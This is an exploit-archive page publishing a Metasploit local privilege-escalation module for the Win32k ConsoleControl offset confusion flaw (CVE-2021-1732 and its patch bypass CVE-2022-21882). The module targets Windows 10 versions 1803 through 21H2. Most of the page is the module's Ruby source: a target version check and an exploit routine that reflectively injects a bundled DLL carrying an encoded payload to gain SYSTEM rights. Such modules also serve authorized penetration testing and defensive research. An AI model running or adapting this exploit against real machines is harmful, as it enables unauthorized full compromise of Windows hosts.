what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Win32k ConsoleControl Offset Confusion / Privilege Escalation

Win32k ConsoleControl Offset Confusion / Privilege Escalation
Posted Feb 28, 2022
Authored by Spencer McIntyre, BITTER APT, LiHao, KaLendsi, MaDongZe, TuXiaoYi, JinQuan, L4ys | Site metasploit.com

A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.

tags | exploit, root, vulnerability
systems | windows
advisories | CVE-2021-1732, CVE-2022-21882
SHA-256 | 9902434a58e36c7838c71ee860592d8624368fc1b380cf4c9ccf530f09895fd2

Win32k ConsoleControl Offset Confusion / Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = AverageRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck

include Msf::Exploit::Deprecated
moved_from 'exploit/windows/local/cve_2021_1732_win32k'

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Win32k ConsoleControl Offset Confusion',
'Description' => %q{
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.

This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
},
'License' => MSF_LICENSE,
'Author' => [
# CVE-2021-1732
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
# CVE-2022-21882
'L4ys', # github poc
# both CVEs
'KaLendsi', # github pocs
# Metasploit exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' => {
'DisableNops' => true
},
'References' => [
# CVE-2021-1732 references
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
# CVE-2022-21882 references
[ 'CVE', '2022-21882' ],
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
],
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
'SideEffects' => []
}
}
)
)
end

def check
sysinfo_value = sysinfo['OS']

if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end

build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")

unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
return CheckCode::Safe
end

CheckCode::Appears
end

def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end

if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end

encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)

print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close